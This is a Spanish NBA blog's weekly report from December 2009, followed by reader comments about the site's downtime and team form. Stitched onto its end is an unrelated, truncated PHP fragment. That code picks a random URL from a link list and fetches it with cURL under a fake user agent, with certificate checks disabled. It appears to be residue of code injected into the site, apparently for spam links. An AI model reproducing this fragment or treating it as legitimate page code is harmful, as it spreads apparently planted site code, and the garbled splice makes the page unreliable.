Informe Semanal #7

14 de December de 2009 por TheDeerHunter

Si este fin de semana ha sido más largo de lo habitual debido a los problemas del blog, os pedimos 1000 disculpas, y sinó también, que no es de recibo tener problemas de conexión casi durante 3 días seguidos. Desgraciadamente estos problemas han sido totalmente  ajenos a nosotros y hasta esta tarde parece que no se han resuelto. Esperemos que no pase nunca más, que el mono por comentar la NBA es muy duro… Sin más dilación, el informe de la semana:

¿Porqué todos los jugones sonríen igual?

Los Celtics, por naturaleza y tradición, son poco dados a sonreir… aunque suelen darles razones a sus rivales de que lo hagan todavía menos. La mejor defensa de la liga vuelve a ponerse en cabeza con 10 victorias consecutivas. Esta próxima semana se enfrentarás a los “temibles” Grizzlies, Sixers y Wolves. Vamos, que hasta el día de Navidad lo tienen hecho.

Por su parte, los Hawks se han dedicado a apalizar al rival que se les pusiese en medio. Se postulan ni más ni menos como la 2ª fuerza del momento en el Este y todo ello sin un mal all-star que llevarse a la boca. El equipo más infravalorado de toda la liga está a un nivel muy similar al de Lakers, por mentar el ejemplo más aproximado.

Sorprende las rachas de Detroit y Knicks. En los Pistons cuidado con el nivel de Stuckey y el gran acoplamiento de sus piezas. Recuperan a Hamilton en su mejor momento y se ponen a tiro de alcanzar muy pronto a Heat y Bucks en el 5º puesto del Este. Ese posiblemente sería su techo. Los Knicks, a base de cañonazos desde la línea de 3 llevan 5 de 6 victorias en diciembre.

Spurs y Mavs también están escalando puestos en el Oeste con toda la plantilla al completo.

Ganarás el pan con el sudor de tu frente.

Muy felices se las traían los amarillos, enrachados sin despeinarse. Una fractura de dedo de Kobe y una derrota en una de las pocas salidas complicadas que han tenido han sembrado una semilla de pesimismo.

En el Oeste todo se aprieta “salvajemente”. Desde Denver (17-7 – 2ª plaza) hasta Memphis (10-13 – 12ª plaza) hay hasta 7 equipos con parcial positivo y enseñando los dientes. Los Jazz han ganado 11 de sus últimos 15 partidos. Houston y Oklahoma aguantan como pueden las embestidas de tanto gallo e incluso los Hornets vuelven a dar señales de vida últimamente.

En el Este sólo podemos destacar a Milwaukee y Pacers en esta categoría. Podríamos forzar y meter a los Raptors, con un balance de 2-2 pero perdiendo a Calderon para bastante tiempo.

Se dejaban llevar

Malas sensaciones en hasta 3 candidatos al anillo. Perder en Salt Lake y en Phoenix no sería preocupante para Orlando. Sí lo son las broncas de Rashard Lewis o el hecho que Howard haga sólo un lanzamiento en todo el partido mientras Vinsanity hace 23. Desde hace tiempo se rumorea que se la tienen jurada a Van Gundy, así que pérdidas absurdas en momentos sensibles o que te ganen un partido con un rebote ofensivo con Supermán desaparecido son hechos que no pueden generar otra cosa más que malos rollos.

La “animadLeBron” está más a flor de piel que nunca. Por primera vez desde hace mucho tiempo no lidera las votaciones para el all-star y su equipo pierde contra Grizzlies y Rockets. Se avecina una gira por el Oeste que puede poner muchas cosas en su sitio.

Los Suns han perdido 3 de sus últimos 4. La cuarta derrota no tuvo lugar de milagro y no es normal que un día Stoudamire destroce vivo a Dwight Howard y el siguiente haga el ridículo como el que hizo contra los Nuggets.

Los resto de equipos con balances negativos esta semana están encabezados por Portland, a un paso de irse a posiciones fuera de playoffs y con peor pinta cada día, Kings, Warriors, Bobcats y Bulls.

Los Nets, noticia, lograron su segunda victoria del año esta semana. Victoria pírrica pues de premio tendrán que afrontar lesión de Douglas-Roberts. Si ya les cuesta ganar intentándolo, pronto perderán a conciencia…

The Carabasas Club

El club del “cerito” lo encabezan los Sixers con 12 derrotas seguidas como 12 soles y 4 de ellas con “la respuesta” en sus filas. Vuelven a él fieles los Wolves y Clippers, además de los Wizards.

Comenta

6 comentarios a esta entrada

  1. Uno cualquiera dice:
    #1

    Uf, menos mal que sólo fue algo temporal, la verdad es que me empezaba a temer lo peor (joer, que catastrofista soy, 2 días y ya estoy así jajaja).

    Aunque eso es buena señal, lo hacéis tan bien que no puedo pasar 1día sin leeros 😉

      Citar

  2. rojorob dice:
    #2

    Sí, menos mal. Ya creía que os habían pillado con algún asunto turbio…

      Citar

  3. sergio dice:
    #3

    Si q se ha echado de menos si… ya iba a mandaros un correo para ver que habia ocurrido. Aunque el blog sea vuestro, para mucho de nosotros es una liberacion poder comentar nuestros puntos de vista con gente que ama y entiende esta liga.

    Esta semana la liga se esta poniendo muy interesante. Equipos que pensabamos que estarian en Playoffs sin problemas se estan descolgando y viceversa. Los problemas de Cavs y Orlando aunque distintos crean bastantes dudas. Muy bien los Hawks pero no se si tienen plantilla para plantar cara en Playoffs… no de un quinteto vive el hombre….

      Citar

  4. Quique dice:
    #4

    Me uno a las felicitaciones por la vuelta… de verdad que se echaba de menos no leeros.

    Sergio, con un quinteto ganaron los Lakers el anyo pasado el anillo 🙂 Por su puesto que no es el mismo quinteto (ni parecido), pero a día de hoy me parecen más peligrosos en un playoff que los Cavs o Magic.
    Sobre Lebron, los “anti-king”, que al parecer hay bastantes, se están haciendo notar cada vez más. Y si encima él se encarga de darles motivos con sus bailecitos y chorradas varias… (lamentable contra Chicago).

    Un saludo!

      Citar

  5. Otro Cualquiera dice:
    #5

    Menos mal que habéis vuelto, sólo ha sido un día y se os ha echado de menos…

      Citar

  6. HeiNeKeN dice:
    #6

    Para cuanto tiene Chris Douglas-Roberts?? joder parece que esta temporada a mis Nets les ha mirado un tuerto… todo sale mal… o peor!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>